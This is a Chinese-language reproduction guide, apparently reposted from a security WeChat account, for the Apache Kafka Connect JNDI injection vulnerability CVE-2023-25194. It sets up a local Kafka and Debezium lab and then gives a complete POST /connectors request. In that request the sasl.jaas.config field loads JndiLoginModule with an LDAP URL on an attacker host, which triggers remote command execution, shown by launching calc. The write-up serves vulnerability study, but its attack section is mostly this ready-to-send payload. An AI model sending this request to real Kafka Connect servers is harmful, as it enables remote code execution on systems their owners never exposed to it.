搭建漏洞环境(如果启动报错建议更换为JAVA11)
kafka_2.11-2.4.0.rar(74.6 MB)
或
http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz
启动命令
binwindowszookeeper-server-start.bat configzookeeper.properties
binwindowskafka-server-start.bat configserver.properties
binwindowsconnect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties
如果提示 输入行太长 命令语法不正确,输入:
漏洞复现
访问http://127.0.0.1:8083/connector-plugins
查看是否存在依赖
![Apache Kafka JNDI注入漏洞(CVE-2023-25194) Apache Kafka JNDI注入漏洞(CVE-2023-25194)]()
展开
注:需要对数据库进行配置(时区设置)
查看time_zone变量
![Apache Kafka JNDI注入漏洞(CVE-2023-25194) Apache Kafka JNDI注入漏洞(CVE-2023-25194)]()
设置时期:
![Apache Kafka JNDI注入漏洞(CVE-2023-25194) Apache Kafka JNDI注入漏洞(CVE-2023-25194)]()
POC代码如下:
接着使用如下请求包创建连接器
POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 821
{
"name": "debezium-test-50173",
"config": {
"connector.class": "io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "127.0.0.1",
"database.port": "3306",
"database.user": "root",
"database.password": "root",
"database.server.id": "316545017",
"database.server.name": "test1",
"database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
"database.history.kafka.topic": "quickstart-events", "database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://ip:8089/Basic/Command/calc" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
}
}
![Apache Kafka JNDI注入漏洞(CVE-2023-25194) Apache Kafka JNDI注入漏洞(CVE-2023-25194)]()
相关连接:
https://www.yuque.com/yuqueyonghukcxcby/wwdc80/yntiuyx4a6gnpn1z
https://github.com/ohnonoyesyes/CVE-2023-25194
原文始发于微信公众号(TEST安全):Apache Kafka JNDI注入漏洞(CVE-2023-25194)
评论